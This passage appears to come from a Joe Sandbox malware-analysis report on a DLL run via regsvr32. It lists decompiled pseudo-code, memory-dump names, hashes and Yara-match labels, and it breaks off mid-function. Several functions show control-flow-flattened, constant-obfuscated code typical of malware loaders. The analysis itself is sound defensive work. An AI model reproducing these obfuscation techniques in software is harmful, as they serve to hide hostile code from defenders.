0x10026907
0x1002690a
0x1002693e
0x00000000
0x1002693e
0x1002690c
0x10026912
0x10026933
0x00000000
0x10026933
0x10026914
0x10026915
0x10026928
0x00000000
0x10026928
0x10026919
0x00000000
0x00000000
0x1002691e
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 100268EB

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9fa50ce5bc7b16ef3416c4978c8f5d30f600775966525ab33086535c1ebae51b
Instruction ID: 4535b96f9d1e7e0bbfbe641467a5c7fac84b66b1b802fc5e566faf5a4a64a73b
Opcode Fuzzy Hash: 9fa50ce5bc7b16ef3416c4978c8f5d30f600775966525ab33086535c1ebae51b
Instruction Fuzzy Hash: 93212032A182079BD71DCD38ED855BDF7ACEB5C245BD1413AE806DA190DE32D984DA50

Uniqueness

Uniqueness Score: -1.00%

Function 10026318 Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10026318(void* __eflags) {
				void* _t6;
				void* _t10;
				signed char _t16;

				_t6 = E100225A0( *0x1009529c);
				asm("sbb eax, eax");
				 *0x10095298 =  ~(_t6 - 3) + 1;
				_t10 = E100225A0( *0x100952a0);
				asm("sbb eax, eax");
				 *0x1009528c =  *0x1009528c & 0x00000000;
				 *0x10095290 =  ~(_t10 - 3) + 1;
				if( *0x10095298 == 0) {
					 *0x10095294 = E100269C9( *0x1009529c);
				} else {
					 *0x10095294 = 2;
				}
				EnumSystemLocalesA(E1002639F, 1);
				_t16 =  *0x100952a4;
				if((_t16 & 0x00000001) == 0 || (_t16 & 0x00000002) == 0 || (_t16 & 0x00000007) == 0) {
					 *0x100952a4 =  *0x100952a4 & 0x00000000;
					return _t16;
				}
				return _t16;
			}

0x1002631e
0x1002632e
0x10026331
0x10026336
0x10026341
0x10026343
0x10026353
0x10026358
0x10026372
0x1002635a
0x1002635a
0x1002635a
0x1002637e
0x10026384
0x1002638c
0x10026397
0x00000000
0x10026397
0x1002639e

APIs

EnumSystemLocalesA.KERNEL32(1002639F,00000001,10090DD4,1001F8E7,?,10095038,?,?,?,00000000), ref: 1002637E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b8af5363b6eb3ccc5fe9f1a1616484de4319d2efb11ed7495a1509d32e8742a4
Instruction ID: a4e876383f6fc3094472f765c89623702e81bdeb970f90acd3abf76b6067a040
Opcode Fuzzy Hash: b8af5363b6eb3ccc5fe9f1a1616484de4319d2efb11ed7495a1509d32e8742a4
Instruction Fuzzy Hash: EDF03C714611229EF708CF35EEA675437E5FB0A346F90021AE40DDA2F0D7769584CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100265A3 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E100265A3(void* __eflags) {
				void* _t2;
				intOrPtr _t5;
				int _t7;

				_t2 = E100225A0( *0x1009529c);
				asm("sbb eax, eax");
				_t5 =  ~(_t2 - 3) + 1;
				 *0x10095298 = _t5;
				if(_t5 == 0) {
					 *0x10095294 = E100269C9( *0x1009529c);
				} else {
					 *0x10095294 = 2;
				}
				_t7 = EnumSystemLocalesA(E100265F9, 1);
				if(( *0x100952a4 & 0x00000004) == 0) {
					 *0x100952a4 =  *0x100952a4 & 0x00000000;
					return _t7;
				}
				return _t7;
			}

0x100265a9
0x100265b4
0x100265b6
0x100265b7
0x100265bc
0x100265d6
0x100265be
0x100265be
0x100265be
0x100265e2
0x100265ef
0x100265f1
0x00000000
0x100265f1
0x100265f8

APIs

EnumSystemLocalesA.KERNEL32(100265F9,00000001,?,10090DD4,1001F8E7,?,10095038,?,?,?,00000000), ref: 100265E2

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b200223c11d5c006b1955b8e78dfd75709572decc5960e31cb2592263980bfb1
Instruction ID: f47284bc9c9596cff20bcb9fb6639b56e236c8e4beec47e581dd2f2c333ff962
Opcode Fuzzy Hash: b200223c11d5c006b1955b8e78dfd75709572decc5960e31cb2592263980bfb1
Instruction Fuzzy Hash: 99E01AB15216328EF708CF21EEA67143BA6F70A706F94412BE50CC96F5CB7644848B40

Uniqueness

Uniqueness Score: -1.00%

Function 100266B6 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E100266B6(void* __eflags) {
				void* _t2;
				int _t6;

				_t2 = E100225A0( *0x100952a0);
				asm("sbb eax, eax");
				 *0x10095290 =  ~(_t2 - 3) + 1;
				_t6 = EnumSystemLocalesA(E100266ED, 1);
				if(( *0x100952a4 & 0x00000004) == 0) {
					 *0x100952a4 =  *0x100952a4 & 0x00000000;
					return _t6;
				}
				return _t6;
			}

0x100266bc
0x100266c7
0x100266d1
0x100266d6
0x100266e3
0x100266e5
0x00000000
0x100266e5
0x100266ec

APIs

EnumSystemLocalesA.KERNEL32(100266ED,00000001,10090E58,?,10090DD4,1001F8E7,?,10095038,?,?,?,00000000), ref: 100266D6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 17ff0deea726200502f8eba15a7512b3c99417132fd6538e87a3cf5a1f2f2231
Instruction ID: fdd829a6ac41a8c49b60715ca09d8943ad3a3eec3f8ac5dbbd505741acff4505
Opcode Fuzzy Hash: 17ff0deea726200502f8eba15a7512b3c99417132fd6538e87a3cf5a1f2f2231
Instruction Fuzzy Hash: 07D0A9B46202269EF3088F31DE8DB203A98FB1AB06FC0021AEA1CCC0E0C3778404CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003CC388 Relevance: 1.4, Strings: 1, Instructions: 151
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003CC388(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				void* _t125;
				void* _t127;
				void* _t128;
				intOrPtr _t140;
				signed int _t146;
				signed int _t148;
				intOrPtr _t158;
				signed int* _t161;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(1);
				_push(__edx);
				_push(1);
				E003C2528(_t125);
				_t157 = _v20;
				_t161 =  &(( &_v40)[7]);
				_v16 = 0xec200;
				_t158 = 0;
				_v12 = 0x646ab;
				_t127 = 0x9518f;
				_v8 = 0xd7b13;
				_v4 = 0;
				do {
					while(_t127 != 0x3691a) {
						if(_t127 == 0x56682) {
							_v36 = 0xbcd1ce;
							_v36 = _v36 >> 0xc;
							_v36 = _v36 << 3;
							_v36 = _v36 * 0xf;
							_v36 = _v36 ^ 0x000464c5;
							_v32 = 0xd361da;
							_v32 = _v32 | 0x647922d6;
							_v32 = _v32 ^ 0xde7eb130;
							_v32 = _v32 ^ 0xba89ee84;
							E003D4FB8(_v20, _v36, _v32);
						} else {
							if(_t127 == 0x9518f) {
								_t127 = 0xe0b08;
								continue;
							} else {
								if(_t127 == 0xadc80) {
									_v36 = 0xdf6206;
									_v36 = _v36 >> 0xa;
									_v36 = _v36 >> 0x10;
									_v36 = _v36 << 6;
									_v36 = _v36 ^ 0x0005a5b6;
									_v24 = 0x77c6ea;
									_v24 = _v24 ^ 0x5f6310e8;
									_v24 = _v24 ^ 0x5f102084;
									_v28 = 0xc77dcb;
									_t146 = 0x56;
									_v28 = _v28 * 0x61;
									_v28 = _v28 ^ 0x4b9b0704;
									_v32 = 0x184456;
									_v32 = _v32 / _t146;
									_v32 = _v32 + 0xffff6141;
									_v32 = _v32 ^ 0xfff0a76d;
									_v40 = 0x80d541;
									_v40 = _v40 | 0xdf7d9f6a;
									_v40 = _v40 ^ 0x29fef4f2;
									_v40 = _v40 ^ 0xf6055d3e;
									E003D7514(_v36, _v24, 1, _v28, _a20, _a12, _v20, 1, _v32, _t146, _v40);
									_t161 =  &(_t161[9]);
									_t127 = 0x56682;
									_t158 =  !=  ? 1 : _t158;
									continue;
								} else {
									if(_t127 != 0xe0b08) {
										goto L13;
									} else {
										_v36 = 0x5d8f22;
										_t148 = 0x25;
										_v36 = _v36 / _t148;
										_v36 = _v36 ^ 0x0000e712;
										_v32 = 0xf5dfa0;
										_v32 = _v32 >> 2;
										_v32 = _v32 ^ 0x00302bfd;
										_t140 = E003D80D4(_t148);
										_v36 = 0x26948c;
										_t157 = _t140;
										_v36 = _v36 ^ 0x9fdc11e1;
										_v36 = _v36 | 0xe848a298;
										_v36 = _v36 ^ 0x00055802;
										if(_t140 != _v36) {
											_t127 = 0x3691a;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t158;
					}
					_v40 = 0x86718;
					_v40 = _v40 >> 7;
					_v40 = _v40 + 0xb0a9;
					_v40 = _v40 | 0x8bebb005;
					_v40 = _v40 ^ 0x8bebe14f;
					_v36 = 0x38ad0;
					_v36 = _v36 >> 7;
					_v36 = _v36 + 0xffffac72;
					_v36 = _v36 + 0xffff5649;
					_v36 = _v36 ^ 0xfffc8866;
					_v24 = 0x59ea7c;
					_v24 = _v24 >> 3;
					_v24 = _v24 ^ 0x0001e3a0;
					_t128 = E003CAC9D( &_v20, _v40, _v36, _v24, _t157);
					_t161 =  &(_t161[3]);
					if(_t128 == 0) {
						_t127 = 0xe133;
						goto L13;
					} else {
						_t127 = 0xadc80;
						continue;
					}
					goto L16;
					L13:
				} while (_t127 != 0xe133);
				goto L16;
			}

0x003cc38f
0x003cc395
0x003cc39a
0x003cc39e
0x003cc3a2
0x003cc3a3
0x003cc3a4
0x003cc3a5
0x003cc3aa
0x003cc3ae
0x003cc3b1
0x003cc3b9
0x003cc3bb
0x003cc3c3
0x003cc3c8
0x003cc3d5
0x003cc3d9
0x003cc3d9
0x003cc3e6
0x003cc5f0
0x003cc5f8
0x003cc5fd
0x003cc607
0x003cc60b
0x003cc613
0x003cc61b
0x003cc623
0x003cc62b
0x003cc63f
0x003cc3ec
0x003cc3f1
0x003cc54e
0x00000000
0x003cc3f7
0x003cc3fc
0x003cc47d
0x003cc487
0x003cc48c
0x003cc491
0x003cc496
0x003cc49e
0x003cc4a6
0x003cc4ae
0x003cc4b6
0x003cc4c5
0x003cc4c6
0x003cc4ca
0x003cc4d2
0x003cc4e0
0x003cc4e4
0x003cc4ec
0x003cc4f4
0x003cc4fc
0x003cc504
0x003cc50c
0x003cc537
0x003cc53c
0x003cc541
0x003cc546
0x00000000
0x003cc3fe
0x003cc403
0x00000000
0x003cc409
0x003cc409
0x003cc419
0x003cc41c
0x003cc420
0x003cc428
0x003cc430
0x003cc435
0x003cc445
0x003cc44a
0x003cc452
0x003cc454
0x003cc45c
0x003cc464
0x003cc470
0x003cc476
0x00000000
0x003cc476
0x003cc470
0x003cc403
0x003cc3fc
0x003cc3f1
0x003cc646
0x003cc64e
0x003cc64e
0x003cc558
0x003cc564
0x003cc569
0x003cc571
0x003cc579
0x003cc581
0x003cc589
0x003cc58e
0x003cc596
0x003cc59e
0x003cc5a6
0x003cc5ae
0x003cc5b3
0x003cc5c8
0x003cc5cd
0x003cc5d2
0x003cc5de
0x00000000
0x003cc5d4
0x003cc5d4
0x00000000
0x003cc5d4
0x00000000
0x003cc5e3
0x003cc5e3
0x00000000

Strings

|Y, xrefs: 003CC5A6

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: |Y
API String ID: 2962429428-4190251829
Opcode ID: 21096e5a95f7f13507efaf938df11cb8cc3802ee9ea8a9e1103f3f3984fb9957
Instruction ID: 6ff296f1767740cff39f1105e568ce89776f17baff8737f9f85d1d577b4b3dfa
Opcode Fuzzy Hash: 21096e5a95f7f13507efaf938df11cb8cc3802ee9ea8a9e1103f3f3984fb9957
Instruction Fuzzy Hash: 356130711083429BC756CF25EA8A91BBAE1FBC4B48F104D1DF096A6220C7B5CA4DDB93

Uniqueness

Uniqueness Score: -1.00%

Function 003C51B7 Relevance: 1.4, Strings: 1, Instructions: 132
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003C51B7() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				void* _t92;
				void* _t103;
				signed int _t105;
				signed int _t110;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t120;
				intOrPtr _t133;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v540;
				_t110 = _v532;
				_t92 = 0x87fff;
				_t135 = _v532;
				_t133 = 0;
				_v528 = 0x88071;
				_t132 = _v532;
				_v524 = 0;
				do {
					while(_t92 != 0x37694) {
						if(_t92 == 0x4268b) {
							_v536 = 0x414b7d;
							_t39 =  &_v536; // 0x414b7d
							_t115 = 0x77;
							_v536 =  *_t39 / _t115;
							_t116 = 0x5d;
							_push(_t116);
							_v536 = _v536 / _t116;
							_v536 = _v536 ^ 0x000e1eed;
							_v540 = 0x15361d;
							_v540 = _v540 * 0x12;
							_v540 = _v540 + 0xffff4509;
							_v540 = _v540 ^ 0x017535d2;
							_t103 = E003C2E8C( &_v520, _v536, _t132, _v540);
							_t136 =  &(_t136[3]);
							if(_t103 == 0) {
								L9:
								return _t133;
							}
							_t92 = 0x37694;
							continue;
						}
						if(_t92 == 0x64b3d) {
							_v536 = 0x173f7d;
							_v536 = _v536 >> 0xd;
							_v536 = _v536 ^ 0x00070f9d;
							_t105 = E003CAED1();
							_t132 = _t105;
							if(_t105 == 0) {
								goto L9;
							}
							_t92 = 0x4268b;
							continue;
						}
						if(_t92 == 0x87fff) {
							_t92 = 0x64b3d;
							continue;
						}
						if(_t92 == 0xb7c5d) {
							_v536 = 0xa42db6;
							_v536 = _v536 | 0xecbb78b4;
							_v536 = _v536 ^ 0xecb08104;
							_v540 = 0xd4a5a4;
							_v540 = _v540 + 0xffff16c4;
							_v540 = _v540 << 0xc;
							_v540 = _v540 | 0x1505b314;
							_v540 = _v540 ^ 0x3fc4fceb;
							_t110 = E003D0965(_v536, _v540, _t135);
							_t92 = 0xf3301;
							continue;
						}
						if(_t92 != 0xf3301) {
							goto L17;
						}
						_v532 = 0x913fa0;
						_t120 = 0x4f;
						_v532 = _v532 / _t120;
						_v532 = _v532 ^ 0x2a26d64f;
						if(_t110 == _v532) {
							_t133 = 1;
						}
						goto L9;
					}
					_v536 = 0x298243;
					_v536 = _v536 + 0xffff4046;
					_t111 = 0x21;
					_v536 = _v536 * 0x67;
					_v536 = _v536 ^ 0x106fde38;
					_v532 = 0x7c804f;
					_v532 = _v532 + 0xffffdf89;
					_v532 = _v532 ^ 0x0074976c;
					_v540 = 0x3e0d3b;
					_v540 = _v540 + 0xfa12;
					_v540 = _v540 / _t111;
					_v540 = _v540 + 0x7ec6;
					_v540 = _v540 ^ 0x00034e4d;
					_t135 = E003D7C07( &_v520, _v536, _v532, _v540);
					_t92 = 0xb7c5d;
					L17:
				} while (_t92 != 0x6f8e1);
				goto L9;
			}

0x003c51b7
0x003c51be
0x003c51c2
0x003c51c8
0x003c51cd
0x003c51cf
0x003c51d8
0x003c51dc
0x003c51e0
0x003c51e0
0x003c51f0
0x003c52e9
0x003c52f3
0x003c52f9
0x003c52fe
0x003c5308
0x003c530b
0x003c530c
0x003c5314
0x003c531c
0x003c5329
0x003c532d
0x003c5335
0x003c5346
0x003c534b
0x003c5350
0x003c5249
0x003c5254
0x003c5254
0x003c5356
0x00000000
0x003c5356
0x003c51fb
0x003c52b7
0x003c52bf
0x003c52c4
0x003c52d0
0x003c52d5
0x003c52d9
0x00000000
0x00000000
0x003c52df
0x00000000
0x003c52df
0x003c5206
0x003c52ad
0x00000000
0x003c52ad
0x003c5211
0x003c5255
0x003c525d
0x003c5265
0x003c526d
0x003c5275
0x003c527d
0x003c5282
0x003c528a
0x003c52a0
0x003c52a2
0x00000000
0x003c52a7
0x003c5218
0x00000000
0x00000000
0x003c521e
0x003c522e
0x003c5231
0x003c5235
0x003c5243
0x003c5247
0x003c5247
0x00000000
0x003c5243
0x003c5360
0x003c536a
0x003c5379
0x003c537a
0x003c537e
0x003c5386
0x003c538e
0x003c5396
0x003c539e
0x003c53a6
0x003c53b8
0x003c53bc
0x003c53c4
0x003c53de
0x003c53e0
0x003c53e6
0x003c53e6
0x00000000

Strings

}KA, xrefs: 003C52F3

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: }KA
API String ID: 0-2973681113
Opcode ID: 9afda9bea8158511ea5c4802e01d50d0d2fe0e3b80458c3c5cb8a1c2c6d373c2
Instruction ID: 12b8ea4934d0a07583205ca4a236d26b3e7c9ad084bfe39739ba9482e8e36a7c
Opcode Fuzzy Hash: 9afda9bea8158511ea5c4802e01d50d0d2fe0e3b80458c3c5cb8a1c2c6d373c2
Instruction Fuzzy Hash: 78515A715087028BC319CF28E589A1BBBE4FBD4754F500D2EF494D6261D7B8EE898B93

Uniqueness

Uniqueness Score: -1.00%

Function 003CEA8C Relevance: 1.4, Strings: 1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003CEA8C(void* __ecx, signed int __edx) {
				void* _t99;
				signed int _t104;
				signed int _t123;
				unsigned int _t124;
				signed int _t128;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				unsigned int _t141;
				signed int _t148;
				void* _t149;
				char* _t150;
				unsigned int* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;

				_t150 =  *((intOrPtr*)(_t155 + 0x24));
				_push(_t150);
				_push( *(_t155 + 0x28));
				_t148 = __edx;
				_push(__edx);
				E003C2528(_t99);
				 *(_t155 + 0x28) =  *(_t155 + 0x28) & 0x00000000;
				 *(_t155 + 0x2c) =  *(_t155 + 0x2c) & 0x00000000;
				 *((intOrPtr*)(_t155 + 0x20)) = 0xf3fbe;
				_t156 = _t155 + 0x10;
				 *((intOrPtr*)(_t156 + 0x14)) = 0xcaae2;
				 *(_t156 + 0x28) = 0x92ae39;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0xffff0cc7;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0xffffd1da;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0xffff92f4;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) ^ 0x00911fca;
				_t123 = __edx /  *(_t156 + 0x28);
				if(_t123 != 0) {
					_t153 = _t123;
					do {
						 *(_t156 + 0x10) = 0x29f227;
						_t134 = 0x5a;
						 *(_t156 + 0x10) =  *(_t156 + 0x10) / _t134;
						 *(_t156 + 0x10) =  *(_t156 + 0x10) ^ 0x0008d2d3;
						 *(_t156 + 0x2c) = 0x3a4d07;
						 *(_t156 + 0x2c) =  *(_t156 + 0x2c) * 0x74;
						 *(_t156 + 0x2c) =  *(_t156 + 0x2c) ^ 0x1a69793d;
						 *_t150 = E003C56B4();
						_t150 = _t150 + 4;
						_t153 = _t153 - 1;
					} while (_t153 != 0);
				}
				 *(_t156 + 0x28) = 0xd41dfb;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0xffff0cd2;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) >> 0xf;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0x2702;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) ^ 0x000028ac;
				_t104 =  *(_t156 + 0x28) * _t123;
				_t149 = _t148 - _t104;
				if(_t149 != 0) {
					 *(_t156 + 0xc) = 0xc8f9b0;
					_t128 = 9;
					 *(_t156 + 0xc) =  *(_t156 + 0xc) * 0x79;
					 *(_t156 + 0xc) =  *(_t156 + 0xc) << 0x10;
					 *(_t156 + 0xc) =  *(_t156 + 0xc) ^ 0x0437ca1c;
					 *(_t156 + 0x28) = 0x881707;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) << 7;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) << 4;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) / _t128;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) ^ 0x073af135;
					_t124 = E003C56B4();
					_t141 = _t124 >> 0x10;
					 *_t150 = _t141 >> 8;
					_t151 = _t150 + 1;
